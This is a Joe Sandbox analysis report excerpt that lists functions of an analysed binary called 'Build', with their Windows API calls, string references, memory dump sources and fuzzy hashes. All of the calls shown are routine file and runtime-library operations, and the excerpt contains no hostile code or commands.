Instruction ID: cea9f06a25f1d672e2f1f3acd05cdd311c72ce6def6231b2582e03da147aa37f
Opcode Fuzzy Hash: 5347f34eb0a4de51bbe4f4957c12e7d5aab28ae5022e95119e3c240eb6d1810e
Instruction Fuzzy Hash: FB31F571208305AFDB16CF14D848B6BB7A9FF81715F00891DF5819B294CB759D88CFA2

Function 0036BEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0036E1EC: _wcslen.LIBCMT ref: 0036E1F2

CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0036BBD0,?,00000001,00000000,?,?), ref: 0036BF12
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0036BBD0,?,00000001,00000000,?,?), ref: 0036BF45
GetLastError.KERNEL32(?,?,?,00000000,0036BBD0,?,00000001,00000000,?,?), ref: 0036BF62

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 67db24c6499a5787b527c3994d719f91ee233303c62b52f28faeaa5cdf6223ce
Instruction ID: c101d5f4c0db57afc364013f979fe6a6287aa2cf9fb50b1c7c02f2817ac89c0c
Opcode Fuzzy Hash: 67db24c6499a5787b527c3994d719f91ee233303c62b52f28faeaa5cdf6223ce
Instruction Fuzzy Hash: FB11A131205214AADB13AB748C46BFEB79C9F0A740F018465F901DE1A5DB25DEC1CE65

Function 0038DEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0038DF08

Strings

, xrefs: 0038DF4D

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 19b72f5185c1b293f8c6ff9388b9fbb405c2e660e374a07c8c0d09948a05f37c
Instruction ID: cd77947d9ca517cfddd514bd2ef4bc75384d1307fe9460da88c4ee926ea52e9e
Opcode Fuzzy Hash: 19b72f5185c1b293f8c6ff9388b9fbb405c2e660e374a07c8c0d09948a05f37c
Instruction Fuzzy Hash: 99410AB05083889BDF239F658C84BF6BBBEDF45304F1408EDE59A87182D675AA45DF20

Function 0038D5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0038D62D

Strings

LCMapStringEx, xrefs: 0038D5CD, 0038D5D7

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: cfda40ff527d354ee19806f5f721d65cb00d8878e638a6246556db927589a544
Instruction ID: 49b5b0a7f36c3d6e8b05564743ebc644bac02f04b971af72630410dac9eff382
Opcode Fuzzy Hash: cfda40ff527d354ee19806f5f721d65cb00d8878e638a6246556db927589a544
Instruction Fuzzy Hash: 4101133250420DBBCF036F90DD02DEE7F66EF48710F404155FE08691A1C6328931AB81

Function 0038D55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0038CBBF), ref: 0038D5A5

Strings

InitializeCriticalSectionEx, xrefs: 0038D56B, 0038D575

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 5a4f996caa73ae65accf77a5ba145b1312c2f2fdc68befb7eeec78f843f2fcc4
Instruction ID: b1f90510910cd5c8de1b50bc487c60cc55ca65d022cc4b0b30a117e6f7146c7a
Opcode Fuzzy Hash: 5a4f996caa73ae65accf77a5ba145b1312c2f2fdc68befb7eeec78f843f2fcc4
Instruction Fuzzy Hash: BFF0B43164131CBBCF036FA5DD02DAE7F69DB19710F004166FC056A1A1CE324A109BC1

Function 0038D3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0038D43E

Strings

FlsAlloc, xrefs: 0038D410, 0038D41A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 33a5990eef0609cfb5e6920f9ac5d79dd715c90604d9f41f23532c1a8bfd2e98
Instruction ID: 4434f0adaaeb26ff5cb5528c4bc720188d837f8f354341cab0df0500c39595a4
Opcode Fuzzy Hash: 33a5990eef0609cfb5e6920f9ac5d79dd715c90604d9f41f23532c1a8bfd2e98
Instruction Fuzzy Hash: DFE02B71642718A7CB077BA99C03DAEBB6DCB49720F4102AAFC05572C1CD726E01D7C6

Function 003810A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003810BA

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

3To, xrefs: 003810A8, 003810B4

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 215c7eab97a4d95f185537a1b6a4c672863e16c3a025e66ff9a39ba2c84e5228
Instruction ID: e87c55774569dcdf86f9df89b99d93b7192cf438db3a63e63d9dfed2f1f3a0ac
Opcode Fuzzy Hash: 215c7eab97a4d95f185537a1b6a4c672863e16c3a025e66ff9a39ba2c84e5228
Instruction Fuzzy Hash: 04B012E539C300BC331B3159EC02C37010CD0C0B14370CA6EF804C4480A4402CCD0332

Function 00380A70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00380A5D

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

FjuK8, xrefs: 00380A57, 00380A70

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: FjuK8
API String ID: 1269201914-2861630180
Opcode ID: cc3bd5cee3e301003eaed16beb8921599b821087d8627c9b06d72732d7840a07
Instruction ID: a6f69e270ad831b3270ce5506a514c120f55455b80e4edb3f86d7d73e90971cf
Opcode Fuzzy Hash: cc3bd5cee3e301003eaed16beb8921599b821087d8627c9b06d72732d7840a07
Instruction Fuzzy Hash: 9CB09295299200AC328F61E99D12D36015CD0C0B1032084AAF805C4040A4821C0A0231

Function 00380A8E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00380A5D

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

FjuK8, xrefs: 00380A57

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: FjuK8
API String ID: 1269201914-2861630180
Opcode ID: e99a38884ad60ab615b439b6af8ea66865467564c2788966aca8c5fb6b40c49c
Instruction ID: f2763d23c8e65f95d26f0ed36c8c8d67f886e8ba2d30a4466b13c81927c6fb0c
Opcode Fuzzy Hash: e99a38884ad60ab615b439b6af8ea66865467564c2788966aca8c5fb6b40c49c
Instruction Fuzzy Hash: B4B09296299200AC328F65E89C12D36015CD0C0B1032184AAF804C5040A4851C0D0231

Function 00380A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00380A5D

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

FjuK8, xrefs: 00380A57

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: FjuK8
API String ID: 1269201914-2861630180
Opcode ID: 238122a4a1ad289cb8175ac04a77fb2ae5f2b29775fa06ba139a2f3175893bc4
Instruction ID: e6005b2708fc7578ad19d10fe13dfbd52dd95e274082f8affc246e4999d836c1
Opcode Fuzzy Hash: 238122a4a1ad289cb8175ac04a77fb2ae5f2b29775fa06ba139a2f3175893bc4
Instruction Fuzzy Hash: 99B092962A9300AC338F61E99C12D36015CD0C0B10321856AF404C4040A4851C490231

Function 00380A7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00380A5D

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

FjuK8, xrefs: 00380A57

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: FjuK8
API String ID: 1269201914-2861630180
Opcode ID: 56a65a407e7278f672d8b0bfe8d78bb371453a0b4613aa035fa61de7479b0265
Instruction ID: 44a6e6c765bbb7f7215bdbd6382e76817de8f579035346dc784cab7a1638bb12
Opcode Fuzzy Hash: 56a65a407e7278f672d8b0bfe8d78bb371453a0b4613aa035fa61de7479b0265
Instruction Fuzzy Hash: 2BA002D5299701FC364F75E5DD16C76015CD4C4B557319959F445C444164C5184D5131

Function 00380A6B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00380A5D

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

FjuK8, xrefs: 00380A57

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: FjuK8
API String ID: 1269201914-2861630180
Opcode ID: e031913750ac3039b6055b5d6d261bd5d6e80a26fca044668601b7373c0dcecc
Instruction ID: 44a6e6c765bbb7f7215bdbd6382e76817de8f579035346dc784cab7a1638bb12
Opcode Fuzzy Hash: e031913750ac3039b6055b5d6d261bd5d6e80a26fca044668601b7373c0dcecc
Instruction Fuzzy Hash: 2BA002D5299701FC364F75E5DD16C76015CD4C4B557319959F445C444164C5184D5131

Function 00380A50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00380A5D

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Strings

FjuK8, xrefs: 00380A57

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: FjuK8
API String ID: 1269201914-2861630180
Opcode ID: 1bf9e13f3cc6d753eb1b3caf01252cf320381967b2f66f08cc17c898cdf5e061
Instruction ID: 9b7016f791ae10b75a04fcb9c006fec35ba107a382fe2bf5e5752b70ac145d1f
Opcode Fuzzy Hash: 1bf9e13f3cc6d753eb1b3caf01252cf320381967b2f66f08cc17c898cdf5e061
Instruction Fuzzy Hash: 7BA002D5295701BC364F75E5DD16D76025CD4C0B157319559F545D444174C5184D5131

Function 0038E240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0038DE0B: GetOEMCP.KERNEL32(00000000,?,?,0038E094,?), ref: 0038DE36

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0038E0D9,?,00000000), ref: 0038E2B4
GetCPInfo.KERNEL32(00000000,0038E0D9,?,?,?,0038E0D9,?,00000000), ref: 0038E2C7

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 7482d4400e1c20a7ebf9213cda692884eeccfebdbc4ca31a12c01b9653b32f96
Instruction ID: 4d5a7fbee2c09980c03eb087d5b529d7a21b30e4c7275ee1dbfd75810c7ca577
Opcode Fuzzy Hash: 7482d4400e1c20a7ebf9213cda692884eeccfebdbc4ca31a12c01b9653b32f96
Instruction Fuzzy Hash: 9E513574A003059FDB23BF75C8816BBBBE9EF42300F1444EED0968B291D7B5A942DB90

Function 0036B45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0036B43B,00000800,00000800,00000000,?,?,0036A31D,?), ref: 0036B5EB
GetLastError.KERNEL32(?,?,0036A31D,?,?,?,?,?,?,?,?), ref: 0036B5FA

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b0e4f1265ce5ff97a99b6ee780fa711c3f5d171fcdc26e7d30695751110e7a89
Instruction ID: 95c11b905e4e86e3b2c2286a7c6a2d03ab398b16e3c627ac01e794f258832c57
Opcode Fuzzy Hash: b0e4f1265ce5ff97a99b6ee780fa711c3f5d171fcdc26e7d30695751110e7a89
Instruction Fuzzy Hash: 8441F2702083458BC7239F65C4849FAF3E9EF89360F108529E686C764ADBB5DCC08FA1

Function 0036B01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0036B967,?,?,003687FD), ref: 0036B0A4
CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0036B967,?,?,003687FD), ref: 0036B0D4

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b7e5656119df23adbf4557f86f56445594c10ac7146efe79a6bdc775b0d9502c
Instruction ID: 1726f323f3767e0f2e42e67b698415ee1358e5ffe2255842a364686a38888eda
Opcode Fuzzy Hash: b7e5656119df23adbf4557f86f56445594c10ac7146efe79a6bdc775b0d9502c
Instruction Fuzzy Hash: C1218071504344AFE3319F24CC85BB7BBDCEB89320F018A1AF9A5C65D5D774A9888B62

Function 0036B7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 0036B7FC
SetFileTime.KERNELBASE(?,?,?,?), ref: 0036B8B0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 87ca94288979e158308bddd33be1f9cdda771c050e80aa82dcf33d57c19ddd44
Instruction ID: 7fb919ed38d1343849efdda86a4bcec5049bb9f3eb75bfb6c9655c934d89baf5
